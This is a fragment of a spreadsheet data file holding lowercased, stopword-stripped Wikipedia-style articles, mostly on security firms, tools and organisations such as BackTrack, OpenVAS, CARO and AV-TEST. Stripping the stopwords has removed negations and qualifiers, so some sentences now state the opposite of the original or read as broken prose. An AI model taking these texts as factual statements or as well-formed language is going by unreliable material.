hawaii. references external links official website</t>
  </si>
  <si>
    <t>C'thulhu (assassination)</t>
  </si>
  <si>
    <t>BackTrack</t>
  </si>
  <si>
    <t>backtrack linux distribution focused security, based knoppix linux distribution aimed digital forensics penetration testing use. march 2013, offensive security team rebuilt backtrack around debian distribution released name kali linux. history backtrack distribution originated merger formerly competing distributions focused penetration testing: whax: slax-based linux distribution developed mati aharoni, security consultant. earlier versions whax called whoppix based knoppix. auditor security collection: live based knoppix developed moser included tools organized user-friendly hierarchy.on january 9th, 2010, backtrack improved hardware support, added official fluxbox support. overlap auditor whax purpose collection tools partly merger. overlap done based ubuntu lucid starting backtrack tools backtrack provided users easy access comprehensive large collection security-related tools ranging port scanners security audit. support live live functionality allowed users boot backtrack directly portable media without requiring installation, though permanent installation hard disk network also option. backtrack included many well known security tools including: metasploit integration wi-fi drivers supporting monitor mode (rfmon mode) packet injection aircrack-ng reaver, tool used exploit vulnerability gerix wifi cracker kismet nmap ophcrack ettercap wireshark (formerly known ethereal) beef (browser exploitation framework) hydra owasp mantra security framework, collection hacking tools, add-ons scripts based firefox cisco mass scanner, reliable fast scanner cisco routers test default telnet enabling password. large collection exploits well commonplace software browsers. armitage java frontend metasploit.backtrack arranged tools categories: information gathering vulnerability assessment exploitation tools privilege escalation maintaining access reverse engineering rfid tools stress testing forensics reporting tools services miscellaneous releases whenever version backtrack released, older versions would lose support service backtrack development team. there currently supported versions backtrack. references external links official website offensive security securitynet backtrack</t>
  </si>
  <si>
    <t>OpenVAS</t>
  </si>
  <si>
    <t>openvas (open vulnerability assessment system, originally known gnessus) scanner component greenbone vulnerability manager (gvm), software framework several services tools offering vulnerability scanning vulnerability management.all greenbone vulnerability manager products free software, components licensed general public license (gpl). plugins greenbone vulnerability manager written nessus attack scripting language, nasl. history greenbone vulnerability manager began name openvas, name gnessus, fork previously open source nessus scanning tool, developers tenable network security changed proprietary (closed source) license october 2005. openvas originally proposed pentesters securityspace, discussed pentesters portcullis computer security announced brown slashdot. greenbone vulnerability manager member project software public interest. structure there daily updated feed network vulnerability tests (nvts) 50,000 total july 2020). documentation openvas protocol structure aims well-documented assist developers. openvas compendium publication openvas project delivers documentation openvas. also aircrack-ng backbox backtrack kali linux kismet (software) list free open-source software packages metasploit project nmap zmap (software) references external links openvas site openvas, nikto nmap, owasp attack proxy (zap) openvas, nessus nexpose tested openvas protocol documentation openvas compendium publication openvas project</t>
  </si>
  <si>
    <t>CAUCE</t>
  </si>
  <si>
    <t>cauce, coalition against unsolicited commercial email, non-profit advocacy group works reduce amount unsolicited commercial email, spam, legislation. cauce founded 1997 participants usenet newsgroup news.admin.net-abuse.email spam-l mailing list.cauce north america formed march 2007 merger first cauce, cauce cauce canada, combining strengths sibling cauce organizations. cauce all-volunteer consumer advocacy organization, moved beyond original mission encouraging creation adoption anti-spam laws broader stance defending interests average internet user. other cauce chapters formed canada, europe (where among first lobby effective antispam legislation) australia. cauce india formed late 1990s. 2003, apcauce (cauce asia pacific) formed bring together cauce chapters asia pacific region, hosts technical workshops policy roundtable "regional update" sessions regional network operator conferences sanog apricot also member anti-spyware coalition. also neil schwartzman, co-founder cauce canada references external links cauce around world: cauce north america cauce europe apcauce caube</t>
  </si>
  <si>
    <t>AT&amp;T Cybersecurity</t>
  </si>
  <si>
    <t>at&amp;t cybersecurity developer commercial open source services manage cyber attacks, including open threat exchange, world's largest crowd-sourced computer-security platform. july 2017, platform 65,000 participants contributed million threat indicators daily. company raised $116 million since founded alienvault 2007. july 2018, acquired at&amp;t communications, becoming wholly owned subsidiary transaction completed august 2018. february 2019, alienvault renamed at&amp;t cybersecurity. history ossim project began 2003 started dominique karg, julio casal, ignacio cabrera alberto román. became basis alienvault, founded 2007 madrid, spain.the company hired management team hewlett packard's fortify group 2012, including alienvault barmak meftah, roger thornton five others.in 2015, company partnered intel coordinate real-time threat information. similar deal hewlett packard announced year.in 2015, alienvault researchers released study disclosing chinese hackers circumventing popular privacy tools.alienvault open threat exchange 26,000 participants countries reporting million potential threats daily, june 2015. february 2017, alienvault released anywhere, saas security monitoring platform designed centralize threat detection, incident response compliance management cloud, hybrid cloud, on-premises environments cloud-based console.by july 2017, alienvault open threat exchange platform 65,000 participants contributed million threat indicators daily.it reported 2018 alienvault raised around $120 million since inception. july 2018 at&amp;t announced acquire alienvault undisclosed amount. acquisition completed august 2018 company became subsidiary at&amp;t communications unit.on february 2019, alienvault renamed at&amp;t cybersecurity. products at&amp;t cybersecurity offers paid security platform, called unified security management, integrates threat detection, incident response, compliance management application. threat applications offered hardware, virtual machines, cloud service. other services at&amp;t provides include network vulnerability scanning, vulnerability assessment, vulnerability management. open threat exchange (otx) allows security experts research collaborate threats, compare data integrate threat information security systems. data platform, uses natural language processing machine learning.at&amp;t cybersecurity also runs open source security information management (ossim) project, provides computer security, intrusion detection, response services. finances august 2015, firm raised million expand security business. round institutional venture partners included capital, kleiner perkins, trident capital, jackson square ventures.the company added clients quarter hired chief financial officer help prepare possible initial public offering (ipo).by fiscal year 2016, alienvault recorded percent year-over-year sales growth increased install base percent approximately 5,000 commercial customers. awards year, forbes featured alienvault forbes cloud list.deloitte featured alienvault deloitte technology fast list 2015 2016.in 2015, alienvault "advanced persistent threat (apt) solution year" presented computing security awards. competitors alienvault competes siem network security industry microfocus arcsight, qradar logrhythm, among others. references</t>
  </si>
  <si>
    <t>Physical security</t>
  </si>
  <si>
    <t>physical security describes security measures designed deny unauthorized access facilities, equipment resources protect personnel property damage harm (such espionage, theft, terrorist attacks). physical security involves multiple layers interdependent systems include cctv surveillance, security guards, protective barriers, locks, access control, perimeter intrusion detection, deterrent systems, fire protection, systems designed protect persons property. overview physical security systems protected facilities generally intended deter potential intruders (e.g. warning signs, security lighting perimeter markings); detect intrusions monitor/record intruders (e.g. intruder alarms cctv systems); trigger appropriate incident responses (e.g. security guards police).it security designers, architects analysts balance security controls risks, taking account costs specifying, developing, testing, implementing, using, managing, monitoring maintaining controls, along broader issues aesthetics, human rights, health safety, societal norms conventions. physical access security measures appropriate high security prison military site inappropriate office, home vehicle, although principles similar. elements design deterrence methods goal deterrence methods convince potential attackers successful attack unlikely strong defenses. initial layer security campus, building, office,, physical space uses crime prevention environmental design deter threats. some common examples also basic: warning signs window stickers, fences, vehicle barriers, vehicle height-restrictors, restricted access points, security lighting trenches. physical barriers physical barriers fences, walls, vehicle barriers outermost layer security. they serve prevent, least delay, attacks, also psychological deterrent defining perimeter facility making intrusions seem difficult. tall fencing, topped barbed wire, razor wire metal spikes often emplaced perimeter property, generally type signage warns people attempt entry. however, facilities imposing perimeter walls/fencing possible (e.g. urban office building directly adjacent public sidewalks) aesthetically unacceptable (e.g. surrounding shopping center tall fences topped razor wire); case, outer security perimeter defined walls/windows/doors structure itself. combination barriers barriers typically designed defeat defined threats. this part building codes well fire codes. apart external threats, internal threats fire, smoke migration well sabotage. national building code canada, example, indicates need defeat external explosions building envelope, possible, large electrical transformers located close building. high-voltage transformer fire barriers examples walls designed simultaneously defeat fire, ballistics fragmentation result transformer ruptures, well incoming small weapons fire. similarly, buildings internal barriers defeat weapons well fire heat. example would counter police station embassy, public access room talk security glass employees behind. barrier aligns fire compartment part building code compliance, multiple threats must defeated simultaneously, must considered design. plastic deformation result impact knock loose, tear squish passive fire protection (pfp) materials, particularly materials stressed. some materials times resilient, impact resistant ductile ambient. once stressed fire, change free water dissipates 100°c (212°f), hydrates spent near 300°c (572°f), reached within minutes fire. construction level binders, unlike certain refractories, also degrade heat, thus changing physical properties many materials across different temperature ranges. none normally problem. fact part designs different reasons. combining ballistics fragmentation, prudent consider relevant stresses designing barriers must presumed advertised simultaneously defeat fire, followed hose stream impacts come fire event. natural surveillance another major form deterrence incorporated design facilities natural surveillance, whereby architects seek build spaces open visible security personnel authorized users, intruders/attackers unable perform unauthorized activity without seen. example would decreasing amount dense, tall vegetation landscaping attackers cannot conceal within placing critical resources areas intruders would cross wide, open space reach (making likely someone would notice them). security lighting security lighting another effective form deterrence. intruders less likely enter well-lit areas fear seen. doors, gates, entrances, particular, well allow close observation people entering exiting. when lighting grounds facility, widely distributed low-intensity lighting generally superior small patches high-intensity lighting, latter tendency create blind spots security personnel cctv cameras. important place lighting manner makes difficult tamper (e.g. suspending lights tall poles), ensure backup power supply security lights electricity off. introduction low-voltage led-based lighting products enabled security capabilities, instant-on strobing, substantially reducing electrical consumption. intrusion detection electronic surveillance alarm systems sensors alarm systems installed alert security personnel unauthorized access attempted. alarm systems work tandem physical barriers, mechanical systems, security guards, serving trigger response forms security breached. they consist sensors including perimeter sensors, motion sensors, contact sensors, glass break detectors.however, alarms useful prompt response triggered. reconnaissance phase prior actual attack, intruders test response time security personnel deliberately tripped alarm system. measuring length time takes security team arrive arrive all), attacker determine attack could succeed authorities arrive neutralize threat. loud audible alarms also psychological deterrent, notifying intruders presence detected. jurisdictions, enforcement respond alarms intrusion detection systems unless activation verified eyewitness video. policies like created combat 94–99 percent rate false alarm activation united states. video surveillance surveillance cameras deterrent placed highly visible locations useful incident assessment historical analysis. example, alarms generated camera place, security personnel assess situation camera feed. instances attack already occurred camera place point attack, recorded video reviewed. although term closed-circuit television (cctv) common, quickly becoming outdated video systems lose closed circuit signal transmission instead transmitting camera networks. video monitoring necessarily guarantee human response. human must monitoring situation real time order respond timely manner; otherwise, video monitoring simply means gather evidence later analysis. however, technological advances like video analytics reducing amount work required video monitoring security personnel automatically notified potential security events. access control access control methods used monitor control traffic specific access points areas secure facility. this done using variety systems including cctv surveillance, identification cards, security guards, biometric readers, electronic/mechanical control systems locks, doors, turnstiles gates. mechanical access control systems mechanical access control systems include turnstiles, gates, doors, locks. control locks becomes problem large user populations user turnover. keys quickly become unmanageable, often forcing adoption electronic access control. electronic access control systems electronic access control manages large user populations, controlling user life cycles times, dates, individual access points. example, user's access rights could allow access 0700h 1900h monday friday expire days. these access control systems often interfaced turnstiles entry control buildings prevent unauthorized access. turnstiles also reduces need additional security personnel monitor individual entering building allowing faster throughput. additional sub-layer mechanical/electronic access control protection reached integrating management system manage possession usage mechanical keys locks property within building campus. identification systems access policies another form access control (procedural) includes policies, processes procedures manage ingress restricted area. example deployment security personnel conducting checks authorized entry predetermined points entry. this form access control usually supplemented earlier forms access control (i.e. mechanical electronic access control), simple devices physical passes. security personnel security personnel play central role layers security. technological systems employed enhance physical security useless without security force trained maintenance, knows properly respond breaches security. security personnel perform many functions: patrolling facilities, administering electronic access control, responding alarms, monitoring analyzing video footage. also alarm management artificial intelligence video surveillance biometric device biometrics boundaries security report computer security door security executive protection guard tour patrol system information security logical security perimeter intrusion detection system physical security professional security alarm security company security convergence security engineering surveillance high-voltage transformer fire barriers references</t>
  </si>
  <si>
    <t>CARO</t>
  </si>
  <si>
    <t>caro (computer antivirus research organization) organization established 1990 research study malware. organization perhaps best known virus naming convention 1991 (with subsequent revisions). though widely adopted, still faced usage obstacles. this proposal naming systems product vendors industry groups.the annual workshop biggest caro event. workshop usually organized hosted anti-virus firm home country. workshops started 2007 attendance limited 120-130 anti-malware experts strict policy photography recordings kind: 2007: reykjavik, iceland (organized f-prot) 2008: hoofddorp, netherlands (norman) 2009: budapest, hungary (virus buster) 2010: helsinki, finland (f-secure) 2011: prague, czech republic (avast software) 2012: munich, germany (trend micro mcafee) 2013: bratislava, slovakia (eset) 2014: melbourne, (florida institute technology) 2015: hamburg, germany (trend micro) 2016: bucharest, romania (avira) 2017: krakow, poland (eset) 2018: portland, (amtso) 2019: copenhagen, denmark (csis security group) 2022: brno, czech republic (avast) eicar test file caro, collaboration eicar (european institute computer antivirus research), developed eicar test file, executable string designed test integrity antivirus software. members caro membership private issue, members choosing publicize membership not. members caro, founders not, current not, publicly stated membership point include: friðrik skúlason (founder frisk software international), alan solomon (founder solomon's antivirus toolkit), vesselin bontchev, mikko hyppönen (cro f-secure), eugene kaspersky (founder kaspersky lab), nick fitzgerald, peter ferrie, dmitry gryaznov, igor muttik, atley padgett peterson, costin raiu, peter kruse, morton swimmer, righard zwienenberg philipp wolf. references external links caro website archived 2011-09-28 wayback machine</t>
  </si>
  <si>
    <t>Paramount Defenses</t>
  </si>
  <si>
    <t>paramount defenses privately held american cyber security company develops cyber security solutions "help organizations secure foundational microsoft active directory deployments".the company founded 2006 sanjay tandon, former microsoft program manager active directory security. company headquartered newport beach, california founder. operates guidance advisory board amongst others includes karen worstell, former microsoft chief information security officer (ciso) donald codling, former unit chief liaison federal bureau investigation (fbi) cyber division department homeland security national cyber security division. company produced paramount brief, executive summary, declassified 2016, describes serious cyber security risk potentially impacts foundational cyber security organizations worldwide. history paramount defenses founded 2006. 2013, united states patent office awarded founder cyber security patent governing accurate determination effective access information systems. references external links official website</t>
  </si>
  <si>
    <t>ATT&amp;CK</t>
  </si>
  <si>
    <t>adversarial tactics, techniques, common knowledge mitre att&amp;ck guideline classifying describing cyberattacks intrusions. created mitre corporation released 2013.the framework consists tactics categories consisting "technical objectives" adversary. examples include privilege escalation command control. these categories broken specific techniques sub-techniques.the framework alternative cyber kill chain developed lockheed martin. references external links mitre att&amp;ck</t>
  </si>
  <si>
    <t>AU10TIX</t>
  </si>
  <si>
    <t>au10tix, (formerly technology icts international) identity verification company based hasharon, israel. au10tix founded 2002 technology icts international later diversified commercial civil markets. au10tix technology subsidiary icts international, dutch firm provides solutions services field aviation general security. icts international shares traded otcqb symbol ictsf. au10tix online authentication technology platform first introduce completely automated, machine-learning enhanced process includes image auto-classification, multi-factor image manipulation detection collateral risk factor analytics .au10tix's recent funding $80m investment hc/ft. headquartered israel, au10tix subsidiary icts international n.v. (otcqb: ictsf). references</t>
  </si>
  <si>
    <t>Alliance for Securing Democracy</t>
  </si>
  <si>
    <t>alliance securing democracy (asd) non-partisan transatlantic national security advocacy group formed july 2017 stated countering efforts russia undermine democratic institutions united states europe. 2021, expanded combating malign influence chinese iranian governments state-backed media outlets.the organization chaired primarily former senior united states intelligence state department officials. daily operations zack cooper, research fellow american enterprise institute. laura thornton, formerly international idea, joined group director 2021. laura rosenberger, senior director china biden administration's national security council previously involved. housed german marshall fund united states pursues work united states europe.the publishes online dashboard called "hamilton 2.0" showing activity twitter accounts organization claims linked russian propaganda. history 2016, cia, fbi, nsa, director national intelligence concluded russia interfered elections year. this subsequently confirmed special counsel robert mueller report investigation summarized 2019 testimony congress. alliance securing democracy declared develop strategies "defend against, deter, raise costs" attempts russia "other state actors" undermine democracy. former acting director michael morell, serves asd's advisory council, stated group fulfill role ideally would handled national investigative commission. hamilton "hamilton 2.0" dashboard website tracks real-time twitter social media accounts asserts "linked russian influence," whether knowingly unknowingly. september 2017, 2021, group launched similar german-language dashboards focused possible russian influence german politics ahead federal elections respective years. asd's tracking encompasses social media accounts suspects related russian government russian state media, well accounts believes unconnected russia, repeat sees russian government views. disclose accounts "hamilton 2.0" tracks, citing desire "focus behavior overall network rather dragged hundreds individual debates troll fits role."the newly formed said august 2017 "exploring ways" similarly analyze facebook, reddit, youtube. advisory council staff governed advisory council operating staff drawn american marshall fund. washington post called membership advisory council who's former senior national security officials [the democratic republican] parties." members advisory council include michael chertoff republican worked george bush administration u.s. secretary homeland security) mike mcfaul democrat worked obama administration u.s. ambassador russia), former estonian president toomas hendrik ilves, neoconservative political analyst commentator william kristol, hillary clinton foreign-policy adviser jake sullivan. reception hamilton dashboard cited many news outlets, including york times, washington post, npr, business insider. previously, dashboard received criticism "secret methodology" refusal disclose twitter accounts tracks. founders laura rosenberger jamie said accounts disclosed prevent shut down. james carden wrote nation dashboard seemed characterize factual news items russian propaganda questioned impact political discourse. current lists twitter accounts released.in 2017 article atlantic, peter beinart argued group's efforts important understanding russia's involvement american politics. glenn greenwald wrote group represented political alliance neoconservatives establishment democrats. also propornot references external links official website advisory council members artikel</t>
  </si>
  <si>
    <t>Parasoft</t>
  </si>
  <si>
    <t>parasoft (officially parasoft corporation) independent software vendor specializing automated software testing application security headquarters monrovia, california. founded 1987 four graduates california institute technology planned commercialize parallel computing software tools working caltech cosmic cube, first working hypercube computer built.during 90's, parasoft leveraged technology parallel software toolkit create software test automation tools traditional software development well parallel. starting runtime error detection insure++ product, also added capabilities static code analysis, unit testing, ultimately expanded include application security, functional testing, service virtualization. technologies parasoft develops automated defect prevention technologies support automated defect prevention methodology developed adam kolawa. these technologies automate number defect prevention practices java, c++, .net. static code analysis practice identifies coding issues lead security, reliability, performance, maintainability issues later 1996, parasoft submitted patent application rule-based static code analysis. since then, original static analysis technology extended include security static analysis, data flow analysis, software metrics. 1996, parasoft submitted patent applications technology automatically generates unit test cases. since then, original unit testing technology extended include code coverage analysis, regression testing, traceability. peer code review practice involves manually inspecting source code examine algorithms, review design, search subtle errors automated tools cannot detect. although peer inspection cannot automated, peer code reviews preparation, notification, tracking automated.for cloud, soa, apis, enterprise environments, parasoft technologies automate practices testing, integration testing, system testing, load testing, penetration testing. parasoft's service quality technology first developed 2002.parasoft also develops memory error detection technology finds run-time errors programs. patents submitted technology 1995 1996.for service virtualization, parasoft technologies used automatically capture emulate dependent system behavior mainframes, third-party components, system component unavailable difficult access development testing purposes.parasoft's various technologies used demonstrating industry regulatory compliance adopting agile software development, devops, continuous delivery, continuous testing, test automation. parasoft joined eclipse consortium board stewards 2002.several analyst reports software industry publications mentioned company's service virtualization technology embedded system software development tools. awards recognition parasoft received "customers' choice" award gartner march 2019 "best software test automation software 2019" reviewed customers. gartner's customer choice aware based vetted user surveys course year gartner peer insights platform.parasoft soatest recognized leader forrester 2018 forrester wave omnichannel functional test tools.the reported said "parasoft shined evaluation specifically around effective test maintenance, strong ci/cd application lifecycle management (alm) platform integration".parasoft received "best show" software development award testing category times 2018 part times list. global structure headquarters americas parasoft provider software test automation tools analytics global headquarters monrovia, california. parasoft distributors canada latin america provide local sales technical support. emea parasoft presence emea centers around offices krakow, poland hague, netherlands. parasoft subsidiaries berlin, germany, london, stockholm, sweden, distributors france, italy, israel, south africa. apac shanghai, china parasoft subsidiary. parasoft also subsidiaries bangalore, india singapore. references</t>
  </si>
  <si>
    <t>AV-Comparatives</t>
  </si>
  <si>
    <t>av-comparatives austrian independent organization tests assesses antivirus software, regularly releasing charts reports freely available public media. antivirus vendors meet various requirements regarding trustworthiness reliability order take part tests.av-comparatives issues relevant awards, based antivirus software's comprehensive performance according multiple testing criteria. also supported university innsbruck academic bodies around world, well austrian federal government regional government tirol. real world protection test av-comparatives "real world protection test" test environment closely approximates well antivirus product protect real-world users. test results released monthly (from march june august november). detailed overall result reports released june december. real world protection test framework recognized "standortagentur tirol" 2012 cluster award innovation computer science. latest test series 2018 av-comparatives started large scale enterprise security software test series, consisting real-world test, false alarm test, malware protection test performance test well review. listing tests reviews av-comparatives real-world protection tests file detection tests malware protection test heuristic behaviour test false alarm test performancetest malware removal test anti-phishing test parental control test security reviews tests mobile security review corporate enterprise security reviews powershell-based file-less attacks file-based exploits test operating systems used antivirus tests microsoft windows macos android linux undroid analyzer av-comparatives provided "undroid analyzer" free service website's users since 2013. designed android smartphone users, provides static analysis android apps. users upload android application package (apk) receive quick online analysis containing file hashes, graphical danger level additional information. awards certifications given av-comparatives 2016: 9001:2015 scope "independent tests anti-virus software" 2015: eicar trusted it-security testing 2013: constantinus award computer science, highest award/certification given austrian government (chamber commerce) projects computer science. 2012: austrian eaward 2012: cluster award 2012 references list external links official website constantinus university innsbruck, quality engineering (laura bassi centre) university innsbruck, databases information systems (dbis) standort agentur tirol</t>
  </si>
  <si>
    <t>AllVid</t>
  </si>
  <si>
    <t>allvid proposal develop technology enabling smart broadband-connected video devices access content managed networks cable operators, telcos, satellite-tv operators. initially proposed u.s. federal communications commission's (fcc) national broadband plan 2010. allvid hardware would universal adapter types content video-on-demand pay-per-view, well interactive programming guides, delivered wide variety means, including cable satellite vdsl, iptv, internet tv.allvid intended replace cablecard. unlike cablecard rules applied cable operators, allvid would apply multichannel video programming distributor’s (mvpds) including satellite telco companies. january 2017, allvid never adopted developed. design proposed several design aspects allvid soliciting feedback interested parties final specification going forward rulemaking. major elements fcc's allvid proposal include: gateway device capable decoding video streams feeding home network various devices. adapter device capable decoding video streams feeding directly television consumer electronics device. physical connection using 100base-tx ethernet. internet protocol communications protocol allvid gateway devices. encryption authentication using dtcp-ip standard used digital living network alliance. content ordering billing services handled gateway generated screens additional options requested. service discovery universal plug play, suggested tivo, proposals invited. content encoding proposed support multiple codecs allow devices flexibility choice video formats without requiring transcoding gateway. responses google supported allvid proposal, stating "google supports all-video (“allvid”) solution like forth noi. consumers would well-served inexpensive universal adapter available retail, would feature easy-to-use, common interface, employ nationwide interoperability standards connect televisions, digital video recording devices (“dvrs”), smart video devices. these navigation devices effectively would separate network interface device functionality, making video “portable” across platforms devices."the allvid proposal criticized motion picture association america providing insufficient protection copyright infringement unauthorized multichannel video programming distributors at&amp;t preempting market forces already underway. industry alliance february 2011 several companies announced creation allvid tech company alliance. this group works support implementation allvid standard specifically addresses issues raised national cable television association (ncta). alliance members include: best co., inc. google inc. mitsubishi digital electronics america nagravision sagetv, sony electronics inc. tivo inc. tivo withdrew group 2014 successor proposals unlock january 2016, chairman wheeler proposed rulemaking "unlock set-top box" voted move forward proposal february 2016. critics claimed proposal essentially allvid wheeler refuted. never vote adopt proposal wheeler could majority commissioners support september 2020 closed navigation device proceeding eliminates cablecard support reporting requirements. also keychest protocol ultraviolet set-top references external links matter video device competition (proceeding 10-91) electronic comment filing system</t>
  </si>
  <si>
    <t>AllClear ID</t>
  </si>
  <si>
    <t>allclear (aka allclear formerly debix) provides products services meant protect people personal information threats related identity theft. allclear id's main service providers include technology customer service teams. data breach response services breach response services allclear include notification, call center customer support, identity protection products. notification provides access identity protection services. call center provides team experienced managing anxiety breach victims answer questions incident, reassure individuals, explain identity protection services offered. products available mitigate risk different types breaches including compromised credit cards, passwords, health information, social security numbers. allclear worked large companies manage sensitive highly-visible breach responses including home depot, p.f. chang's, michael's/aaron brothers, store, dairy queen, albertson's/supervalu, anthem bcbs. child identity theft research april 2011 allclear released report richard power, distinguished fellow carnegie mellon university cylab, prevalence child theft. using data supplied allclear power completed largest report ever done child identity theft. from database 40,000 children, power found 4,311 someone else using social security numbers.the today show follow-up investigation, interviewing victims child identity theft. investigators found thieves still living working using child's social security number.in july 2011, holland, along leaders social security administration, identity theft 911, identity theft resource center, more, spoke stolen futures, forum child identity theft. there presented findings cylab report child identity theft, well findings follow data sampling since report release.in 2012, allclear released follow-up report child theft data involving 27,000 minors. this report confirmed growing problem child identity theft, indicating children targeted rate times greater adults awards recognition 2010 debix recognized alwayson global winner "signifying leadership amongst peers game-changing approaches technologies likely disrupt existing markets entrenched players global silicon valley". august 2011 awarded "best resolution" javelin strategy research february 2012 awarded stevie awards sales customer service: customer service department year, contact center year, best technology customer service, front-line customer service professional year (investigator christy mccarley), customer service leader year customer services chief investigator jamie may) february 2013 awarded stevie awards customer service: contact center year, best technology customer service, front-line customer service professional year, contact center manager year, customer service department year. february 2014 awarded stevie awards customer service: young customer service professional year, customer service department year, innovation customer service, contact center year, customer service professional year. recent study, allclear ranked second overall, identity guard placing first. category restoration, allclear tied first alongside identity force royal. history 2004: founded holland, originally named debix, inc. after working financial industry, holland used knowledge banks institutions handled credit requests create debix's identity protection network. holland previously founder works, inc., acquired bank america 2005. works electronic payment solutions provider, holland invented patent-pending technology enables large organizations approve control payments operating expenses credit cards. april 2011: carnegie mellon cylab allclear released "child identity theft" research reporting child identity theft faster-growing crime adult identity theft april 2011: debix introduced allclear first free identity theft protection service families. allclear offers free service monitors data stolen personal information provides free identity repair addition premium product. 2011: partnered sony playstation network outage april july 2011, debix granted u.s. patent 7,983,979 multi-band, multi-factor authentication design. july 2011: holland presents child identity theft research federal trade commission march 2012: debix company name changed allclear inc. 2012: released "child identity theft" research reporting "criminals targeting youngest children. victims five years younger, increase 105% 2011 findings" august 2014: allclear plus offered victims home depot credit card breach 2014. february 2015: allclear secure offered victims anthem inc. data breach 2015. january 2018: allclear offered victims guaranteed rate data security breach september 2017. april 2018: allclear offered delta lines victims [24]7.ai data breach september–october 2017. april 2018: massachusetts state department/ child support division exposed private data 6,100 people apparent coding error comets system company accenture. software vendor covers cost allclear affected people months. references</t>
  </si>
  <si>
    <t>AV-TEST</t>
  </si>
  <si>
    <t>av-test independent organization evaluates rates antivirus security suite software microsoft windows android operating systems, according variety criteria. organisation based magdeburg, germany.every month, researchers publish results testing, list products awarded certification. they regularly test antivirus, anti-spyware firewall software software publishers magazines. field product certification work together tekit consult bonn gmbh (tüv saarland group). tests performed desktop computers servers running windows 2000, 2003; novell netware, linux, solaris, freebsd, openbsd, lotus domino/notes microsoft exchange. history founded andreas marx (ceo) guido habicht. criticism 2013, security specialist security company kaspersky lab, eugene kaspersky, criticized av-test changing certification process. also av-comparatives references external links official website</t>
  </si>
  <si>
    <t>CA Anti-Spyware</t>
  </si>
  <si>
    <t>anti-spyware spyware detection program distributed inc. until 2007, known pestpatrol. this product offered total defense, inc. named total defense anti-virus. history pestpatrol, inc. carlisle, based software company founded david stang robert bales, developed pestpatrol released first version 2000. originally called safersite, company changed name 2002 better reflect focus company. pestpatrol anti-malware product, designed protect computer system threats adware, spyware viruses. performed automated scans system's hard disks, windows registry crucial system areas, enabled manual scans specific threats, selected long list known malicious software. among unique features cookiepatrol, purges spyware cookies, keypatrol, detects keyloggers. unlike anti-spyware programs designed home single desktop, pestpatrol also provided solution network environments found enterprises. among features made appealing enterprise security administrators ability manage networked desktops remotely.early versions product criticized poor user interface, described alternatively something "looks like application ported os/2, unclear buttons" "clunky, text-based ui", reviewers praised malware detection removal capabilities, stating "pestpatrol effective anti-spyware system short switch linux we've ever used".it described infoworld "one established brands anti-spyware", 2002, selected "security product year" network world, cited ability detect remove 60,000 types malware, defenses remote administration tools (rats).billing "authority spyware protection," licensed signature files yahoo! companion others. 2003, along anti-spyware anti-malware companies webroot, lavasoft aluria, formed industry consortium fight malware called consortium antispyware technology (coast).computer associates (now technologies) bought pestpatrol 2004 made part etrust computer security line, includes virus scanner firewall. using newly acquired technology, created bundle named integrated threat management (itm), consisted anti-virus solution pestpatrol anti-spyware.renamed anti-spyware 2007, program bought separately, part internet security. 2007, anti-spyware team instrumental exposing fact facebook collecting personal information users, without knowledge, even users opted facebook's ill-fated beacon program, even users logged facebook. references external links spyware information center</t>
  </si>
  <si>
    <t>Openswan</t>
  </si>
  <si>
    <t>field computer security, openswan provides complete ipsec implementation linux 2.0, 2.2, kernels. openswan, begun fork now-defunct frees/wan project, continues general public license. unlike frees/wan project, exclusively target linux operating system. libreswan forked openswan 2012. also libreswan strongswan external links official website openswan github references</t>
  </si>
  <si>
    <t>AVCATT</t>
  </si>
  <si>
    <t>avcatt (aviation combined arms tactical trainer) mobile aviation training simulator developed communications, link simulation training united states army 2001. entire units (suites) fielded. avcatt used active, reserve army national guard components. avcatt supports unit collective combined arms training ah-64, uh-60, ch-47 oh-58 aircraft. other avcatt modules, non-rated crewmember manned module ((ncm3), sub-system avcatt), linked base configuration support specific unit training requirements. ncm3 supports training non-rated crew members crew coordination, flight, aerial gunnery, hoist sling load-related tasks. avcatt mobile, transportable, multi-station device supports unit collective combined arms training helicopter aircrews. avcatt occupies trailers ncm3 adding third trailer containing reconfigurable modules ch-47 uh-60. both avcatt ncm3 helmet-mounted displays (hmd). management army aviation center (fort rucker) proponent. tradoc capability manager virtual gaming (fort leavenworth) capability manager. stri maneuver collective training system, part integrated training environment material developer. cole engineering services, inc, provides post deployment software support. simulation provides concurrency upgrades part avcatt reconnaissance attack contract. interoperable cctt vcct. terrain data bases fort irwin national training center grafenwoehr-hohenfels iraq fort hood afghanistan korea fort bliss fort campbell fort drum joint base lewis mcchord fort stewart fort bragg fort benning hawaii references stri website aviation combined arms tactical trainer (avcatt) external links communications website avcatt mpeg-video avcatt collective training system older mpeg-video demonstrating avcatt's capabilities cole engineering services simulation</t>
  </si>
  <si>
    <t>Webtrekk</t>
  </si>
  <si>
    <t>webtrekk gmbh german company offers marketing analytics customer intelligence software. with webtrekk, companies connect, analyze activate user marketing data across devices. since 2019 webtrekk part marketing technology service provider, mapp. history webtrekk founded 2004 christian sauer norman wahnschaff. 2009, webtrekk received million venture capital investment corporate finance partners winners awin-sponsored publisher initiative contest. 2012, webtrekk frost sullivan award "finally bringing ‘real time’ into online/digital analytics". 2014, webtrekk closed third round financing, collecting total million deutsche private equity. 2018, webtrekk bronze international stevie award category "business competitive intelligence“ cross device tracking tool, cross device bridge. 2019, webtrekk honored german stevie award gold realtime predictions. 2019, webtrekk acquired marketing technology service provider mapp. products services webtrekk provides variety products gain insights data trigger marketing activities. products services cross-channel campaign reporting ai-enabled marketing intelligence. webtrekk customer analytics suite includes user-centric analytics, personalized product recommendations, customer intelligence dashboards, customer journey tracking, integration, behavior re-targeting. webtrekk data streams enable data captured, processed streamed real time.since acquisition, webtrekk mapp consolidate offerings. webtrekk's customers also access mapp's cross-channel marketing cloud.consulting support another part webtrekk's offering. consulting unit works customers specific, large-scale projects, support team available answer questions functions interface webtrekk products.access raw, first-party data core component webtrekk's products. that data exported real-time data warehouses systems used carry in-depth analyses within customer analytics suite. suite's customizable dashboard engine enables customers display, connected external data sources social media channels systems. customers webtrekk customers, including flixbus, ing, mytoys. focus industries finance, publishing e-commerce. privacy certification products privacy certified german association confirm data privacy security. webtrekk's data servers located european union housed data centres certified international organization standardization. also customer journey references external links analysis real time case study exasol</t>
  </si>
  <si>
    <t>Radiant Mercury</t>
  </si>
  <si>
    <t>radiant mercury cross-domain solution (cds) software application developed lockheed martin primarily navy.as cds, designed allow communications higher-level classified networks lower-level, unclassified networks. also guard (information security) references</t>
  </si>
  <si>
    <t>Operation Bayonet (darknet)</t>
  </si>
  <si>
